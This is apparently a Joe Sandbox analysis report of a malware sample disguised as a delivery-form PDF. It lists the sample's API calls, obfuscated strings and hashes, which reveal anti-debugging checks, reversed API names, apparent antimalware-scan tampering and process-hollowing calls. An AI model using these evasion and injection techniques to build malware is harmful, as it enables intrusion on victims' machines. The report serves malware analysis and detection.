                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CheckConnectionInternet
                                                                                          • String ID: Initialize$OpenSession$ScanBuffer
                                                                                          • API String ID: 3847983778-3852638603
                                                                                          • Opcode ID: c8a0c744243b7ad03a5e3b457d408cfe5760969f8c062d2b374e854c8edb9c2a
                                                                                          • Instruction ID: 7a0e78a737110830e5e15c7b3260ed870cecd3386f2b50e6d524e5a10d34b110
                                                                                          • Opcode Fuzzy Hash: c8a0c744243b7ad03a5e3b457d408cfe5760969f8c062d2b374e854c8edb9c2a
                                                                                          • Instruction Fuzzy Hash: C5410F71B501089BEB12EBA4DC41E9EB3FAFFCC724F625425E085A7240DE74AD018F65
                                                                                          Function 0294DACC Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DB9E), ref: 0294DB0B
                                                                                          • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0294DB45
                                                                                          • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0294DB72
                                                                                          • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0294DB7B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AllocCloseCreateStringWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3308905243-0
                                                                                          • Opcode ID: 543e7aa04b592c9577b41a0813574187386ec6c651e721c81407fe978883ba20
                                                                                          • Instruction ID: f4c8d008a11fcb1359f46a5313d786d8cefb00cc4a11374978f1a88008a28995
                                                                                          • Opcode Fuzzy Hash: 543e7aa04b592c9577b41a0813574187386ec6c651e721c81407fe978883ba20
                                                                                          • Instruction Fuzzy Hash: 8821FF75A40308BAEB11EAE4CC46FDEB7BDEB44B04F514461B600F71C0DBB0AE048A65
                                                                                          Function 029485DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02948668
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                          • String ID: CreateProcessAsUserW$Kernel32
                                                                                          • API String ID: 3130163322-2353454454
                                                                                          • Opcode ID: 8812309ba788897d1a7e0d7a1e162b70e81d59f3d23fad901ffe6f3eb94e8c28
                                                                                          • Instruction ID: 6700d2b5f4902d928765583d69e8ff8e6db3360e30b2adeffcae45b22bdcdfba
                                                                                          • Opcode Fuzzy Hash: 8812309ba788897d1a7e0d7a1e162b70e81d59f3d23fad901ffe6f3eb94e8c28
                                                                                          • Instruction Fuzzy Hash: DC11D3B6604208AFEB81EEACDD41F9E37EDFB8C714F524510FA08D7640DA34E9108B24
                                                                                          Function 029479B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                          • API String ID: 4072585319-445027087
                                                                                          • Opcode ID: 25952f7fe88b29020e8eece16f3236c254d54dc513a03ef722ae1a80fc88307e
                                                                                          • Instruction ID: 5cea3db392b1b4741a30e2cc0de9649e70e175747ea679af2f6bc2afb9eb50ae
                                                                                          • Opcode Fuzzy Hash: 25952f7fe88b29020e8eece16f3236c254d54dc513a03ef722ae1a80fc88307e
                                                                                          • Instruction Fuzzy Hash: 0C111B75644209AFEB11EFA8DC41EEEB7EDEB8D710F514861B904D7680DA30AA148B64
                                                                                          Function 029479B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02947A27
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                          • API String ID: 4072585319-445027087
                                                                                          • Opcode ID: b18558e15a4f53218225b6c6a793741b90302fe5c97cece4e61f723ee8c8ac0f
                                                                                          • Instruction ID: 44186583d89db82375b2330c3872a9dcec932b0a316003d8685c59ff0292cc91
                                                                                          • Opcode Fuzzy Hash: b18558e15a4f53218225b6c6a793741b90302fe5c97cece4e61f723ee8c8ac0f
                                                                                          • Instruction Fuzzy Hash: 28111B75644209AFEB11EFA4DC41EEEB7EDEB8D710F514861B504D7680DA30AA148B64
                                                                                          Function 02948254 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 029482C5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$MemoryReadVirtual
                                                                                          • String ID: ntdll$yromeMlautriVdaeRtN
                                                                                          • API String ID: 2521977463-737317276
                                                                                          • Opcode ID: e58e803560055788a338df71c8035b7f8c9a355ce66be2f6aedd8455714db2ba
                                                                                          • Instruction ID: 63bb954e7a7b7ba230c8de92007b8b0a5bd64ec85c47de7b8e9a36008b98a4ec
                                                                                          • Opcode Fuzzy Hash: e58e803560055788a338df71c8035b7f8c9a355ce66be2f6aedd8455714db2ba
                                                                                          • Instruction Fuzzy Hash: F9010075644209AFEB01EFA8DC51EAE77FEFB8D714F514460F908D7640DA70AD108B64
                                                                                          Function 02947D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02947D74
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                                                          • API String ID: 2719805696-3542721025
                                                                                          • Opcode ID: dae4376cdbf3954bcb1a055c62f8928849b4fd95d7eb727f9262f8539178ead2
                                                                                          • Instruction ID: 4867d9facfd51ac0479da5c41ae7a274557fbcc8a8023a7289266bba752f6dee
                                                                                          • Opcode Fuzzy Hash: dae4376cdbf3954bcb1a055c62f8928849b4fd95d7eb727f9262f8539178ead2
                                                                                          • Instruction Fuzzy Hash: 6E010C75614209AFEB01EFA8DC55EEEB7FDFB8D710F514860F508D7680DA70A9108B64
                                                                                          Function 029484C4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43nativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02948090,?,?,00000000,?,02947A06,ntdll,00000000,00000000,02947A4B,?,?,00000000), ref: 0294805E
                                                                                            • Part of subcall function 02948020: GetModuleHandleA.KERNELBASE(?), ref: 02948072
                                                                                            • Part of subcall function 029480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02948150,?,?,00000000,00000000,?,02948069,00000000,KernelBASE,00000000,00000000,02948090), ref: 02948115
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 0294811B
                                                                                            • Part of subcall function 029480C8: GetProcAddress.KERNEL32(?,?), ref: 0294812D
                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 02948529
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressProc$SectionUnmapView
                                                                                          • String ID: noitceSfOweiVpamnUtN$ntdll
                                                                                          • API String ID: 3503870465-2520021413
                                                                                          • Opcode ID: 15f8fb6009f42646dc2c3e7f57b7b9ff762d9d5fa028ed906992e17827ff32b5
                                                                                          • Instruction ID: d5084d0d8ed327946dab1b0b26f05f9ddb0ad61046525d00c24e3c294b8f2e03
                                                                                          • Opcode Fuzzy Hash: 15f8fb6009f42646dc2c3e7f57b7b9ff762d9d5fa028ed906992e17827ff32b5
                                                                                          • Instruction Fuzzy Hash: 81014F74A44304AFEF11EFA8DC51EAE77FEFB8D710F524860F40497640DA30A9108A24
                                                                                          Function 0294D9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0294DA6C
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DABE), ref: 0294DA82
                                                                                          • NtDeleteFile.NTDLL(?), ref: 0294DAA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: DeleteFileInitStringUnicode
                                                                                          • String ID:
                                                                                          • API String ID: 3559453722-0
                                                                                          • Opcode ID: 46e05b4b3b6181d24654ae4aeae5e36490ae19cd04f2cb34697fb3a9317514fd
                                                                                          • Instruction ID: cdbeb5b953e8697a9684d3115f52623a0e66ab8cab2115864812e0eaf4b0dfe8
                                                                                          • Opcode Fuzzy Hash: 46e05b4b3b6181d24654ae4aeae5e36490ae19cd04f2cb34697fb3a9317514fd
                                                                                          • Instruction Fuzzy Hash: 8101FB79A48248AEEB06EAA08941FCD77B9AB85704F5144A3A254E6082DE74AB048B75
                                                                                          Function 0294DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02934ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02934EDA
                                                                                          • RtlInitUnicodeString.NTDLL(?,?), ref: 0294DA6C
                                                                                          • RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DABE), ref: 0294DA82
                                                                                          • NtDeleteFile.NTDLL(?), ref: 0294DAA1
                                                                                            • Part of subcall function 02934C0C: SysFreeString.OLEAUT32(0294E950), ref: 02934C1A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$AllocDeleteFileFreeInitUnicode
                                                                                          • String ID:
                                                                                          • API String ID: 2841551397-0
                                                                                          • Opcode ID: fb439d69fb3d15e43ec1e5e8189fd21b8aa2cc84c984b16bf5e832dda6cdbd51
                                                                                          • Instruction ID: b53c18fc99f920d429ce296295e972f2f7ed4cd687efc4e3bf472d696cb73239
                                                                                          • Opcode Fuzzy Hash: fb439d69fb3d15e43ec1e5e8189fd21b8aa2cc84c984b16bf5e832dda6cdbd51
                                                                                          • Instruction Fuzzy Hash: 5101F47594420CBADB11EBE0CD51FCEB3FDEB88700F514462E604F6180EB74AB048A74
                                                                                          Function 02946D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 02946CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02946D41,?,?,?,00000000), ref: 02946D21
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02946E34,00000000,00000000,02946DB3,?,00000000,02946E23), ref: 02946D9F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1795937144.0000000002931000.00000020.00001000.00020000.00000000.sdmp, Offset: 02930000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1795921879.0000000002930000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000295D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796065223.000000000298E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002991000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1796204842.0000000002A88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2930000_Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateFromInstanceProg
                                                                                          • String ID:
                                                                                          • API String ID: 2151042543-0
                                                                                          • Opcode ID: 4068e35bc89739fb60a57772564df88bc5c18f61de1897331d12d1dffbcf0bcc
                                                                                          • Instruction ID: b940b29bc877725e005ae830b21b35fb0fd55c0935bf40acab4d1d32a6730cb0
                                                                                          • Opcode Fuzzy Hash: 4068e35bc89739fb60a57772564df88bc5c18f61de1897331d12d1dffbcf0bcc
                                                                                          • Instruction Fuzzy Hash: 3601A7B1608704AEE715DF64DC52D6B7BEDEBCAB10B524875F901D2680EA309A10C961
                                                                                          Function 0294EC74 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InetIsOffline.URL(00000000,00000000,0295AFA1,?,?,?,000002F7,00000000,00000000), ref: 0294ECAE
                                                                                            • Part of subcall function 02948824: LoadLibraryA.KERNEL32(00000000,00000000,0294890B), ref: 02948858
                                                                                            • Part of subcall function 02948824: FreeLibrary.KERNEL32(74AE0000,00000000,02991388,Function_000065D8,00000004,02991398,02991388,05F5E0FF,00000040,0299139C,74AE0000,00000000,00000000,00000000,00000000,0294890B), ref: 029488EB
                                                                                            • Part of subcall function 0294EB94: GetModuleHandleW.KERNEL32(KernelBase,?,0294EF98,UacInitialize,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,Initialize), ref: 0294EB9A
                                                                                            • Part of subcall function 0294EB94: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0294EBAC
                                                                                            • Part of subcall function 0294EBF0: GetModuleHandleW.KERNEL32(KernelBase), ref: 0294EC00
                                                                                            • Part of subcall function 0294EBF0: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0294EC12
                                                                                            • Part of subcall function 0294EBF0: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0294EC29
                                                                                            • Part of subcall function 02937E18: GetFileAttributesA.KERNEL32(00000000,?,0294F8CC,ScanString,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanString,0299137C,0295AFD8,UacScan,0299137C,0295AFD8,UacInitialize), ref: 02937E23
                                                                                            • Part of subcall function 0293C2EC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A858C8,?,0294FBFE,ScanBuffer,0299137C,0295AFD8,OpenSession,0299137C,0295AFD8,ScanBuffer,0299137C,0295AFD8,OpenSession), ref: 0293C303
                                                                                            • Part of subcall function 0294DBB0: RtlDosPa.N(00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DBEB
                                                                                            • Part of subcall function 0294DBB0: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0294DC80), ref: 0294DC1B
                                                                                            • Part of subcall function 0294DBB0: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0294DC30
                                                                                            • Part of subcall function 0294DBB0: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0294DC5C
                                                                                            • Part of subcall function 0294DBB0: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0294DC65
